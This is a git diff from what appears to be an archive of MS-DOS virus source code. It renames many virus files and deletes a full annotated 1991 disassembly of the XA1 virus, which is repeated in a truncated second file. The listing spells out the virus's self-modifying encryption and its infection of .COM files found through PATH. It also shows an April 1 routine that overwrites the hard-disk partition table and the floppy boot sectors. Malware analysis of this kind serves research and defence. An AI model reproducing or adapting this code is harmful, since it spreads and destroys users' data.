diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xph_1100.asm b/MSDOS/Virus.MSDOS.RiotsAgainstTechnology.asm
similarity index 100%
rename from MSDOS/X-Index/Virus.MSDOS.Unknown.xph_1100.asm
rename to MSDOS/Virus.MSDOS.RiotsAgainstTechnology.asm
diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.y_yank1.asm b/MSDOS/Virus.MSDOS.VladimirBotchev.asm
similarity index 100%
rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.y_yank1.asm
rename to MSDOS/Virus.MSDOS.VladimirBotchev.asm
diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xmas.pas b/MSDOS/Virus.MSDOS.X-MAS.pas
similarity index 100%
rename from MSDOS/X-Index/Virus.MSDOS.Unknown.xmas.pas
rename to MSDOS/Virus.MSDOS.X-MAS.pas
diff --git a/MSDOS/Virus.MSDOS.XA1.7z b/MSDOS/Virus.MSDOS.XA1.7z
new file mode 100644
index 00000000..53b30171
Binary files /dev/null and b/MSDOS/Virus.MSDOS.XA1.7z differ
diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xhiltar.asm b/MSDOS/Virus.MSDOS.Xhiltar.asm
similarity index 100%
rename from MSDOS/X-Index/Virus.MSDOS.Unknown.xhiltar.asm
rename to MSDOS/Virus.MSDOS.Xhiltar.asm
diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale_asm.asm b/MSDOS/Virus.MSDOS.Yale.asm
similarity index 100%
rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.yale_asm.asm
rename to MSDOS/Virus.MSDOS.Yale.asm
diff --git a/MSDOS/Virus.MSDOS.YankeeDoodle.7z b/MSDOS/Virus.MSDOS.YankeeDoodle.7z
new file mode 100644
index 00000000..fd1d0d4b
Binary files /dev/null and b/MSDOS/Virus.MSDOS.YankeeDoodle.7z differ
diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yeah1.asm b/MSDOS/Virus.MSDOS.Yeah.asm
similarity index 100%
rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.yeah1.asm
rename to MSDOS/Virus.MSDOS.Yeah.asm
diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yelet.asm b/MSDOS/Virus.MSDOS.Yelet.j.asm
similarity index 100%
rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.yelet.asm
rename to MSDOS/Virus.MSDOS.Yelet.j.asm
diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.you_got_it.asm b/MSDOS/Virus.MSDOS.YouGotIt.asm
similarity index 100%
rename from MSDOS/Y-Index/Virus.MSDOS.Unknown.you_got_it.asm
rename to MSDOS/Virus.MSDOS.YouGotIt.asm
diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.asm b/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.asm
deleted file mode 100644
index e3d62287..00000000
--- a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.asm
+++ /dev/null
@@ -1,909 +0,0 @@
-;==============================================
-; Virus XA1 isolated in Poland in June 1991
-;
-; disassembled by Andrzej Kadlof July 1991
-;
-; (C) Polish Section of Virus Information Bank
-;==============================================
-
-; virus entry point
-
-0100 EB07 jmp 0109
-
-0102 56 0A 03 59 00 ; first 7 bytes forms virus signature
-0107 2A 00 ; generation counter, never used (?)
-
-; prepare stack for tricks
-; stack usage:
-; [BP + 2] cleared but not used
-; [BP + 0] offset in block
-; [BP - 2] low byte of size of decrypted part and encryption key
-
-0109 0E push cs ; make free space on stack
-010A E80000 call 010D ; put current offset on the stack
-010D FA cli ; disable interrupt to safe stack
-010E 8BEC mov bp,sp
-0110 58 pop ax
-0111 32C0 xor al,al
-0113 894602 mov [bp+02],ax ; corrupt debbuger return address ??
-0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt
-
-; encrypt virus code, this routine is changed in different virus copies
-
-011B B9CE05 mov cx,05CE ; length of decrypted block
-011E B08C mov al,8C ; 8C is changed!
-0120 8846FF mov [bp-01],al
-0123 8B5E00 mov bx,[bp] ; current position in block
-; ^^ changed, possible 3 wariants:
-; ..5E.. mov bx,[bp] versions 0, 1, 2
-; ..76.. mov si,[bp] versions 3, 4, 5
-; ..7E.. mov di,[bp] versions 6, 7, 8
-
-0126 884EFE mov [bp-02],cl ; low byte of counter
-0129 8A4EFF mov cl,[bp-01] ; encrypt key
-012C D207 rol byte ptr [bx],cl ; byte manipulation
-; ^^^^ changed, possible 9 wariants:
-; 000F add byte ptr [bx],cl version 0
-; 300F xor byte ptr [bx],cl version 1
-; D2O7 rol byte ptr [bx],cl version 2
-; 000C add byte ptr [si],cl version 3
-; 300C xor byte ptr [si],cl version 4
-; D204 rol byte ptr [si],cl version 5
-; 000D add byte ptr [di],cl version 6
-; 300D xor byte ptr [di],cl version 7
-; D205 rol byte ptr [di],cl version 8
-
-012E EB00 jmp 0130 ; short pause
-0130 43 inc bx ; position in block
-; ^^ changed, possible 3 wariants:
-; 43 inc bx version 0, 1, 2
-; 46 inc si version 3, 4, 5
-; 47 inc di version 6, 7, 8
-
-0131 8A4EFE mov cl,[bp-02] ; restore block size
-0134 E2F0 loop 0126 ; offset is decrypted!
-
-; encrypted part
-
-0136 FB sti
-
-; get address of curent DTA and store it on the stack
-
-0137 B42F mov ah,2F
-0139 CD21 int 21
-013B 06 push es
-013C 53 push bx
-
-; get keyboard status bits
-
-013D 33C0 xor ax,ax
-013F 8ED8 mov ds,ax
-0141 A01704 mov al,[0417]
-0144 2410 and al,10 ; extract scroll lock state
-0146 50 push ax ; store
-0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag
-
-; restore DS
-
-014C 8CC8 mov ax,cs
-014E 8ED8 mov ds,ax
-
-; intercepte INT 24h
-
-0150 BAC606 mov dx,06C6
-0153 B82425 mov ax,2524 ; set interrupt vector
-0156 CD21 int 21
-
-; search for PATH= in environment block
-
-0158 A12C00 mov ax,[002C] ; segment of environment block
-015B 8EC0 mov es,ax
-015D 33FF xor di,di ; begin of environment block
-015F FC cld
-
-0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker
-0164 741D je 0183 ; end fo block
-
-0166 BE1B05 mov si,051B ; offset of string 'PATH='
-0169 B90500 mov cx,0005 ; length of string
-016C 8BC7 mov ax,di ; starting address
-016E F3A6 rep cmpsb ; compare
-0170 7411 je 0183 ; found
-
-0172 8BF8 mov di,ax ; last starting point
-0174 32C0 xor al,al
-0176 B5FF mov ch,FF ; maximum block size
-0178 F2AE repnz scasb
-017A 74E4 je 0160
-
-017C BF1A05 mov di,051A ; end of buffer for path
-017F 8CC8 mov ax,cs ; restore ES
-0181 8EC0 mov es,ax
-0183 C706C1056205 mov word ptr [05C1],0562
-
-; set local DTA
-
-0189 BA3605 mov dx,0536
-018C B41A mov ah,1A ; set DTA
-018E CD21 int 21
-
-0190 A1F906 mov ax,[06F9]
-0193 A3F706 mov [06F7],ax
-0196 A1FD06 mov ax,[06FD]
-0199 A3FB06 mov [06FB],ax
-019C B90500 mov cx,0005 ; counter of potential victims
-019F BA1505 mov dx,0515 ; '*.COM', 0
-01A2 06 push es
-01A3 57 push di
-01A4 51 push cx
-
-01A5 8CC8 mov ax,cs
-01A7 8EC0 mov es,ax
-01A9 B9FFFF mov cx,FFFF ; all possible attributes
-01AC B44E mov ah,4E ; find first
-01AE EB06 jmp 01B6
-
-01B0 59 pop cx ; restore counter
-01B1 E35B jcxz 020E ; limit reached, check show/destruction
-
-01B3 B44F mov ah,4F ; find next
-01B5 51 push cx ; store counter
-
-01B6 CD21 int 21
-01B8 7203 jb 01BD ; continue
-
-01BA E9F100 jmp 02AE
-
-; restore address of path in environment block
-
-01BD 59 pop cx
-01BE 5F pop di
-01BF 07 pop es
-
-01C0 26803D00 cmp es:byte ptr [di],00 ; end of block?
-01C4 744A je 0210 ; yes
-
-; copy path to buffer
-
-01C6 BB6205 mov bx,0562 ; offset of buffer
-
-01C9 268A05 mov al,es:[di] ; next character
-01CC 0AC0 or al,al ; end of block?
-01CE 740A je 01DA ; yes
-
-01D0 47 inc di
-01D1 3C3B cmp al,3B ; ';', end of path?
-01D3 7405 je 01DA ; yes
-
-01D5 8807 mov [bx],al ; copy character
-01D7 43 inc bx ; increase pointer
-01D8 EBEF jmp 01C9 ; get next character
-
-01DA 81FB6205 cmp bx,0562 ; buffer not empty?
-01DE 74E0 je 01C0 ; empty
-
-01E0 8A47FF mov al,[bx-01]
-01E3 3C3A cmp al,3A ; ':', root directory
-01E5 7408 je 01EF ; yes
-
-01E7 3C5C cmp al,5C ; check last character, '\'
-01E9 7404 je 01EF ; there is
-
-01EB C6075C mov byte ptr [bx],5C ; add '\'
-01EE 43 inc bx ; pointer to last character
-01EF 06 push es
-01F0 57 push di
-01F1 51 push cx
-01F2 891EC105 mov [05C1],bx ; store it
-01F6 8BF3 mov si,bx
-01F8 81EB6205 sub bx,0562 ; find path length
-01FC 8BCB mov cx,bx
-01FE BF1405 mov di,0514 ; destination buffer
-0201 8CC8 mov ax,cs ; restore ES
-0203 8EC0 mov es,ax
-0205 4E dec si
-0206 FD std
-0207 F3A4 rep movsb ; copy
-0209 8BD7 mov dx,di
-020B 42 inc dx
-020C EB97 jmp 01A5 ; find first
-
-; end of infection proces, check condition for destruction/show
-
-020E 58 pop ax ; balance stack
-020F 58 pop ax
-
-0210 8CC8 mov ax,cs ; restore ES
-0212 8EC0 mov es,ax
-
-; get date
-
-0214 B42A mov ah,2A ; get date
-0216 CD21 int 21
-
-0218 81FA0104 cmp dx,0401 ; April 1?
-021C 7533 jne 0251 ; no
-
-;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
-;
-; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B:
-;
-;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
-
-; copy partition table to sector 11h of side 0, track 0
-
-021E BA8000 mov dx,0080 ; first hard drive
-0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table)
-0224 BB0307 mov bx,0703 ; destroy victim code
-0227 B80102 mov ax,0201 ; read 1 sector
-022A 52 push dx
-022B 51 push cx
-022C 53 push bx
-022D CD13 int 13 ; disk I/O
-022F 5B pop bx
-0230 59 pop cx
-0231 5A pop dx
-0232 B111 mov cl,11 ; new place for partition table
-0234 B80103 mov ax,0301 ; write partition table
-0237 CD13 int 13
-
-; set and of sector marker in the buffer
-
-0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker
-
-; overwrite partition table
-
-023F B280 mov dl,80
-0241 E87404 call 06B8 ; write one sector to disk
-
-; overwrite boot sector of drive A:
-
-0244 32D2 xor dl,dl
-0246 E86F04 call 06B8 ; write one sector do disk
-
-; overwrite boot sector of drive B:
-
-0249 B201 mov dl,01
-024B E86A04 call 06B8 ; write disk
-
-024E EB0A jmp 025A
-0250 90 nop
-
-; compare date
-
-0251 81FA180C cmp dx,0C18 ; december 24?
-0255 7203 jb 025A ; date earlier
-
-;<><><><<><><><><><><><><><><><><><><><>
-;
-; CHRISTMAS SHOW
-;
-; see the description of subroutine 05D7
-;<><><><><><><><><><><><><><><><><><><><><>
-
-0257 E87D03 call 05D7 ; drow christmas tree
-
-; make sound
-
-025A E440 in al,40
-025C 3CF8 cmp al,F8
-025E 7206 jb 0266
-
-0260 E461 in al,61
-0262 0C03 or al,03
-0264 E661 out 61,al
-
-; restore the state of scroll lock flag
-
-0266 33C0 xor ax,ax
-0268 8ED8 mov ds,ax
-026A 58 pop ax
-026B 08061704 or [0417],al
-
-; restore INT 24h
-
-026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP
-0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP
-0279 B82425 mov ax,2524 ; set interrupt vector
-027C CD21 int 21
-
-; restore DTA
-
-027E 5A pop dx
-027F 1F pop ds
-0280 B41A mov ah,1A ; set DTA
-0282 CD21 int 21
-
-; restore DS
-
-0284 8CC8 mov ax,cs
-0286 8ED8 mov ds,ax
-
-0288 BEF006 mov si,06F0
-028B 8B3EF706 mov di,[06F7]
-028F 033EFB06 add di,[06FB]
-0293 57 push di
-0294 B90700 mov cx,0007
-0297 FC cld
-0298 F3A4 rep movsb
-029A 33C0 xor ax,ax
-029C 8BD8 mov bx,ax
-029E 8BD0 mov dx,ax
-02A0 8BE8 mov bp,ax
-
-02A2 8B36F706 mov si,[06F7]
-02A6 BF0001 mov di,0100
-02A9 8B0EFB06 mov cx,[06FB]
-02AD C3 ret
-
-02AE BE5405 mov si,0554 ; file name in FCB
-02B1 8B3EC105 mov di,[05C1] ; address of destination
-02B5 B90D00 mov cx,000D ; length of asciiz string
-02B8 FC cld
-02B9 F3A4 rep movsb ; copy
-02BB BF2005 mov di,0520 ; buffer for file name
-02BE E8FA01 call 04BB ; copy
-02C1 7503 jne 02C6
-
-02C3 E9EAFE jmp 01B0 ; find next/destruct/show
-
-02C6 BF2B05 mov di,052B
-02C9 E8EF01 call 04BB ; copy file name
-02CC 7503 jne 02D1
-
-02CE E9DFFE jmp 01B0 ; find next/destruct/show
-
-02D1 C606610500 mov byte ptr [0561],00
-02D6 90 nop
-02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA
-02DC 740F je 02ED ; hiden, system or read only, open file
-
-02DE BA6205 mov dx,0562 ; file name
-02E1 33C9 xor cx,cx ; clear all attributes
-02E3 B80143 mov ax,4301 ; set file attributes
-02E6 CD21 int 21
-02E8 7303 jnb 02ED ; open file
-
-02EA E9C3FE jmp 01B0 ; find next/destruct/show
-
-02ED BA6205 mov dx,0562
-02F0 B8023D mov ax,3D02 ; open file for read/write
-02F3 CD21 int 21
-
-02F5 8BD8 mov bx,ax ; handle
-02F7 7303 jnb 02FC
-
-02F9 E9B4FE jmp 01B0 ; find next
-
-; check file size
-
-02FC A15205 mov ax,[0552] ; high word of file size in DTA
-02FF 0BC0 or ax,ax
-0301 7403 je 0306 ; file below 64K
-
-0303 E99001 jmp 0496 ; close file and find next
-
-0306 A15005 mov ax,[0550] ; lower word of file size
-0309 3D0700 cmp ax,0007 ; minimum file size
-030C 72F5 jb 0303 ; close file and find next
-
-030E 3D00F8 cmp ax,F800 ; maximum file size
-0311 73F0 jnb 0303 ; close file and find next
-
-; mayby already infected?
-
-0313 8B16F706 mov dx,[06F7] ; form address of bufer
-0317 0316FB06 add dx,[06FB]
-031B B90700 mov cx,0007 ; number of bytes
-031E 52 push dx
-031F 51 push cx
-0320 B43F mov ah,3F ; read file
-0322 CD21 int 21
-
-0324 59 pop cx
-0325 5E pop si
-0326 7208 jb 0330 ; read error, close and find next
-
-; compare first 7 bytes with own code
-
-0328 BF0001 mov di,0100 ; destination
-032B FC cld
-032C F3A6 rep cmpsb
-032E 7503 jne 0333
-
-0330 E96301 jmp 0496 ; close file and find next, (infected!)
-
-; get and store file date and time
-
-0333 B80057 mov ax,5700 ; get file time stamp
-0336 CD21 int 21
-0338 72F6 jb 0330 ; close file, find next
-
-033A 89160107 mov [0701],dx ; store date
-033E 890EFF06 mov [06FF],cx ; store time
-0342 C606610501 mov byte ptr [0561],01
-0347 90 nop
-
-; check file size, if less than 603h bytes then append some garbage
-
-0348 A15005 mov ax,[0550] ; file size
-034B 3D0306 cmp ax,0603
-034E 7321 jnb 0371
-
-; file length is less than 603h, add some garbage
-
-0350 33D2 xor dx,dx
-0352 33C9 xor cx,cx
-0354 B80242 mov ax,4202 ; move file ptr to EOF
-0357 CD21 int 21
-0359 7303 jnb 035E ; no errors, continue
-
-035B E93801 jmp 0496 ; close file and find next
-
-035E B90306 mov cx,0603 ; number of bytes
-0361 2B0E5005 sub cx,[0550] ; file size
-0365 B440 mov ah,40 ; write file
-0367 CD21 int 21
-0369 B80306 mov ax,0603 ; new file size
-036C 7303 jnb 0371
-
-036E E92501 jmp 0496 ; close file and find next
-
-; now file is at least 603h bytes long
-
-0371 FEC4 inc ah
-0373 A3F906 mov [06F9],ax ; oryginal file size + 256
-0376 A15005 mov ax,[0550] ; file size
-0379 BE0306 mov si,0603 ; virus length
-037C 33FF xor di,di
-037E 3BC6 cmp ax,si
-0380 7302 jnb 0384
-
-0382 8BF0 mov si,ax
-
-0384 8936FD06 mov [06FD],si
-
-0388 8BD7 mov dx,di
-038A 33C9 xor cx,cx
-038C B80042 mov ax,4200 ; move file ptr to BOF
-038F CD21 int 21
-0391 7303 jnb 0396
-
-0393 E90001 jmp 0496 ; close file and find next
-
-0396 8B16F706 mov dx,[06F7]
-039A 0316FB06 add dx,[06FB]
-039E B90002 mov cx,0200
-03A1 3BF1 cmp si,cx
-03A3 7302 jnb 03A7
-
-03A5 8BCE mov cx,si ; number of bytes
-
-03A7 52 push dx
-03A8 51 push cx
-03A9 B43F mov ah,3F ; read file
-03AB CD21 int 21
-03AD 59 pop cx
-03AE 5A pop dx
-03AF 7303 jnb 03B4 ; continue
-
-03B1 E9E200 jmp 0496 ; close file and find next
-
-03B4 52 push dx
-03B5 51 push cx
-03B6 33D2 xor dx,dx
-03B8 33C9 xor cx,cx
-03BA B80242 mov ax,4202 ; move file ptr to EOF
-03BD CD21 int 21
-03BF 59 pop cx
-03C0 5A pop dx
-03C1 7303 jnb 03C6 ; continue
-
-03C3 E9D000 jmp 0496 ; close file and find next
-
-03C6 B440 mov ah,40 ; write file
-03C8 CD21 int 21
-03CA 7303 jnb 03CF
-
-03CC E9C700 jmp 0496 ; close file and find next
-
-03CF 81C70002 add di,0200
-03D3 81EE0002 sub si,0200
-03D7 7602 jbe 03DB
-
-03D9 EBAD jmp 0388
-
-03DB FF060701 inc word ptr [0107] ; infection counter
-03DF 33D2 xor dx,dx
-03E1 33C9 xor cx,cx
-03E3 B80042 mov ax,4200 ; move file ptr to BOF
-03E6 CD21 int 21
-03E8 7303 jnb 03ED
-
-03EA E9A900 jmp 0496 ; close file and find next
-
-03ED 53 push bx ; store handle
-03EE E440 in al,40
-03F0 A807 test al,07
-03F2 74FA je 03EE
-
-03F4 A21F01 mov [011F],al ; change decryption key
-
-; get random number from system timer count
-
-03F7 33C0 xor ax,ax
-03F9 8AF8 mov bh,al
-03FB 8ED8 mov ds,ax
-03FD A06C04 mov al,[046C] ; timer, low byte
-
-0400 8CCA mov dx,cs ; restore DS
-0402 8EDA mov ds,dx
-
-; generate rundom number in BX in the range 0..8
-
-0404 B103 mov cl,03
-0406 F6F1 div cl ; AL <- AL/3, AH <- remainder
-0408 8AEC mov ch,ah ; store remainder (0, 1 or 2)
-040A 32E4 xor ah,ah ; prepare division
-040C F6F1 div cl ; AL <- AL / 9, AH <- remainder
-040E 8AC4 mov al,ah ; AL <- second remainder
-0410 02C0 add al,al ; *2, AL in [0..4]
-0412 02C4 add al,ah ; *3, AL in [0..6]
-0414 02C5 add al,ch ; first remainder
-0416 8AD8 mov bl,al ; BL in [0..8]
-
-; multiply BX by 4 (table entry size)
-
-0418 03DB add bx,bx
-041A 03DB add bx,bx
-041C 81C3C906 add bx,06C9 ; offset of table
-
-; modify encryption routine (automodyfication)
-
-0420 8A07 mov al,[bx]
-0422 A22401 mov [0124],al ; 3 versions 5E/76/7E
-0425 8B4701 mov ax,[bx+01]
-0428 A32C01 mov [012C],ax ; 9 wersions
-042B 8A4703 mov al,[bx+03] ; 3 versions
-042E A23001 mov [0130],al
-0431 8AC5 mov al,ch
-
-; prepare decrypt routine
-
-0433 BBED06 mov bx,06ED
-0436 D7 xlat
-0437 A26104 mov [0461],al ; modify decryption routine
-
-; write new encryption routine to file
-
-043A 5B pop bx ; restore handle
-043B BA0001 mov dx,0100 ; begin of file
-043E B93500 mov cx,0035 ; block size
-0441 B440 mov ah,40 ; write file
-0443 CD21 int 21
-0445 724F jb 0496 ; close file and find next
-
-; decryption routine
-
-0447 BE3501 mov si,0135 ; start of decrypted block
-044A B9CE05 mov cx,05CE ; size of decrypted block
-044D 53 push bx ; store handle
-044E 51 push cx
-044F B80002 mov ax,0200
-0452 8B1EF706 mov bx,[06F7]
-0456 031EFB06 add bx,[06FB]
-045A 53 push bx
-045B 8A0E1F01 mov cl,[011F] ; decription key
-
-045F 8A2C mov ch,[si]
-0461 D2CD ror ch,cl ; <-- changed (3 variants)
-
-; ^^ changed byte, possible wariants:
-; 28CD sub ch,cl versions: 0, 3, 6
-; 30CD xor ch,cl versions: 1, 4, 7
-; D2CD ror ch,cl versions: 2, 5, 8
-
-0463 882F mov [bx],ch
-0465 43 inc bx
-0466 46 inc si
-0467 48 dec ax
-0468 75F5 jne 045F
-
-046A 5A pop dx
-046B 59 pop cx
-046C 5B pop bx
-046D 51 push cx
-046E 81F90102 cmp cx,0201
-0472 7203 jb 0477
-
-0474 B90002 mov cx,0200
-0477 B440 mov ah,40 ; write file
-0479 CD21 int 21
-047B 59 pop cx
-047C 7218 jb 0496 ; close file and find next
-
-047E 81E90002 sub cx,0200
-0482 77C9 ja 044D
-
-; restore file time stamp
-
-0484 8B160107 mov dx,[0701] ; file date
-0488 8B0EFF06 mov cx,[06FF] ; file time
-048C B80157 mov ax,5701 ; set file time stamp
-048F CD21 int 21
-0491 7203 jb 0496 ; close file and find next
-
-; decrease counter on the stack
-
-0493 59 pop cx
-0494 49 dec cx
-0495 51 push cx
-
-0496 B43E mov ah,3E ; close file
-0498 CD21 int 21
-049A 8A0E4B05 mov cl,[054B] ; attributes
-049E FE0E6105 dec byte ptr [0561]
-04A2 7405 je 04A9
-
-04A4 F6C107 test cl,07 ; hidden, system, read only
-04A7 740F je 04B8
-
-04A9 80F920 cmp cl,20 ; archive
-04AC 740A je 04B8
-
-04AE BA6205 mov dx,0562 ; file name
-04B1 32ED xor ch,ch
-04B3 B80143 mov ax,4301 ; set file attributes
-04B6 CD21 int 21
-04B8 E9F5FC jmp 01B0 ; find next
-
-;----------------------------------------
-; move 11 bytes do DS:DI ('C:\COMMAND.')
-
-04BB BE6205 mov si,0562
-04BE B90B00 mov cx,000B
-04C1 FC cld
-04C2 F3A6 rep cmpsb
-04C4 C3 ret
-
-; buffer for path
-
-04C5 30 31 32 33 34 35 36 37 01234567
-04CD 38 39 30 31 32 33 34 35 89012345
-04D5 36 37 38 39 30 31 32 33 67890123
-04DD 34 35 36 37 38 39 30 31 45678901
-04E5 32 33 34 35 36 37 38 39 23456789
-04ED 30 31 32 33 34 35 36 37 01234567
-04F5 38 39 30 31 32 33 34 35 89012345
-04FD 36 37 38 43 3A 5C 4A 45 678C:\JE
-0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P
-050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\
-
-; paterns for search
-
-0515 2A 2E 43 4F 4D 00 50 41 *.COM PA
-051D 54 48 3D TH=
-
-; buffers for file names
-
-0520 49 42 4D 42 49 IBMBI
-0525 4F 2E 43 4F 4D 00 O.COM
-
-052B 49 42 IB
-052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM
-0535 00
-
-; local DTA
-
-0536 03 3F 3F 3F 3F 3F 3F ;\
-053D 3F 3F 43 4F 4D FF 02 00 ; | reserved
-0545 00 00 00 00 00 00 ;/
-054B 20 ; file attribute
-054C 00 60 71 0E ; file time stamp
-0550 DB 62 00 00 ; file size
-0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0)
-
-0561 01 ; flag: attributes are changed
-
-0562 43 3A 5C C:\
-0565 43 4F 4D 4D 41 4E 44 2E COMMAND.
-056D 43 4F 4D 00 00 4D 00 00 COM M
-0575 00 2E 43 4F 4D 00 4F 68 .COM Oh
-057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
-0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
-058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
-0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo
-059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh
-05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
-05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
-05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
-05BD 68 4E 6F 21 hNo!
-
-05C1 65 05 ;
-
-;---------------------------------------
-; write character (or space) cx times
-
-05C3 B020 mov al,20
-
-05C5 50 push ax
-05C6 E89E00 call 0667 ; write character
-05C9 58 pop ax
-05CA E2F9 loop 05C5
-05CC C3 ret
-
-;-------------
-; next line
-
-05CD B00D mov al,0D
-05CF E89500 call 0667 ; write character
-05D2 B00A mov al,0A
-05D4 E99000 jmp 0667 ; write character
-
-;------------------------------
-; drow christmast tree
-;
-; result will look like this:
-;
-;
-; ­
-; ***
-; *****
-; *******
-; *********
-; ***********
-; *************
-; ***************
-; *****************
-; *******************
-; *********************
-; ***********************
-; *************************
-; ***************************
-; *****************************
-; ÛÛÛ
-; ÛÛÛ
-; ÛÛÛ
-;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
-; Und er lebt doch noch : Der Tannenbaum !
-; Frohe Weihnachten ...
-;
-
-05D7 B92700 mov cx,0027
-05DA E8E6FF call 05C3 ; clear 39 characters
-05DD B0AD mov al,AD ; '­'
-05DF E88500 call 0667 ; write character
-05E2 E8E8FF call 05CD ; new line
-05E5 BB0300 mov bx,0003
-05E8 BA2600 mov dx,0026
-
-05EB 8BCA mov cx,dx
-05ED E8D3FF call 05C3 ; write CX spaces
-05F0 8BCB mov cx,bx
-05F2 B02A mov al,2A ; '*'
-05F4 E8CEFF call 05C5 ; write CX characters
-05F7 E8D3FF call 05CD ; new line
-05FA 4A dec dx
-05FB 83C302 add bx,0002
-05FE 83FB1F cmp bx,001F
-0601 75E8 jne 05EB
-
-0603 BB0300 mov bx,0003
-0606 B92600 mov cx,0026
-0609 E8B7FF call 05C3 ; write CX spaces
-060C B90300 mov cx,0003
-060F B0DB mov al,DB ; 'Û'
-0611 E8B1FF call 05C5 ; write CX characters
-0614 E8B6FF call 05CD ; next line
-0617 4B dec bx
-0618 75EC jne 0606
-
-061A B95000 mov cx,0050 ; full line
-061D B0CD mov al,CD ; 'Í'
-061F E8A3FF call 05C5 ; write character CX times
-0622 B91300 mov cx,0013
-0625 E89BFF call 05C3 ; write CX spaces
-0628 BB7406 mov bx,0674 ; string: Und er lebt doch ...
-062B E82C00 call 065A ; write string
-062E B91D00 mov cx,001D
-0631 E88FFF call 05C3 ; clear part of line
-0634 EB24 jmp 065A ; write asciiz string pointed by BX
-0636 90 nop
-
-0637 E80000 call 063A
-
-063A 5B pop bx
-063B 83C30D add bx,000D
-063E 8CC8 mov ax,cs
-0640 8ED8 mov ds,ax
-0642 E81500 call 065A ; write string
-0645 EBFE jmp 0645 ; hang CPU
-
-0647 41 70 72 69 6C 2C 20 41 April, A
-064F 70 72 69 6C 20 2E 2E 2E pril ...
-0657 20 07 00
-
-;-----------------------------------
-; write asciiz string pointed by BX
-
-065A 8A07 mov al,[bx] ; get character
-065C 43 inc bx ; next character
-065D 0AC0 or al,al ; and of string?
-065F 7405 je 0666 ; yes, RET
-
-0661 E80300 call 0667 ; write character
-0664 EBF4 jmp 065A ; get next character
-0666 C3 ret
-
-;--------------------
-; write character TTL
-
-0667 52 push dx
-0668 51 push cx
-0669 53 push bx
-066A 32FF xor bh,bh
-066C B40E mov ah,0E
-066E CD10 int 10
-0670 5B pop bx
-0671 59 pop cx
-0671 59 pop cx
-0672 5A pop dx
-0673 C3 ret
-
-0674 55 6E 64 20 65 72 20 6C Und er l
-067C 65 62 74 20 64 6F 63 68 ebt doch
-0684 20 6E 6F 63 68 20 3A 20 noch :
-068C 44 65 72 20 54 61 6E 6E Der Tann
-0694 65 6E 62 61 75 6D 20 21 enbaum !
-069C 0D 0A 00 46 72 6F 68 65 Frohe
-06A4 20 57 65 69 68 6E 61 63 Weihnac
-06AC 68 74 65 6E 20 2E 2E 2E hten ...
-06B4 0D 0A 07 00
-
-;------------------------------------------
-; write one sector to disk specified in DL
-; track 9, side 0 sector 1
-
-06B8 32F6 xor dh,dh
-06BA B90100 mov cx,0001
-06BD BB3706 mov bx,0637
-06C0 B80103 mov ax,0301
-06C3 CD13 int 13
-06C5 C3 ret
-
-;==================
-; INT 24h handler
-
-06C6 B000 mov al,00
-06C8 CF iret
-
-; table of bytes for changing encrypt routine
-
-06C9 5E 00 0F 43
-06CD 5E 30 0F 43
-06D1 5E D2 07 43
-06D5 76 00 0C 46
-06D9 76 30 0C 46
-06DD 76 D2 04 46
-06E1 7E 00 0D 47
-06E5 7E 30 0D 47
-06E9 7E D2 05 47
-
-; table for variants of decrypt routine
-
-06ED 28 30 D2
-
-; part of victime code
-
-06F0 F3A4 rep movsb
-06F2 8BF1 mov si,cx
-06F4 8BF9 mov di,cx
-06F6 C3 ret
-
-06F7 0307 ; offset of buffer/modified code
-06F9 DB63 ; file size + 256
-06FB C603 ;
-06FD 0306 ;
-06FF 0060 ; file date
-0701 710E ; file time
-
diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.lst b/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.lst
deleted file mode 100644
index e3d62287..00000000
--- a/MSDOS/X-Index/Virus.MSDOS.Unknown.xa1.lst
+++ /dev/null
@@ -1,909 +0,0 @@
-;==============================================
-; Virus XA1 isolated in Poland in June 1991
-;
-; disassembled by Andrzej Kadlof July 1991
-;
-; (C) Polish Section of Virus Information Bank
-;==============================================
-
-; virus entry point
-
-0100 EB07 jmp 0109
-
-0102 56 0A 03 59 00 ; first 7 bytes forms virus signature
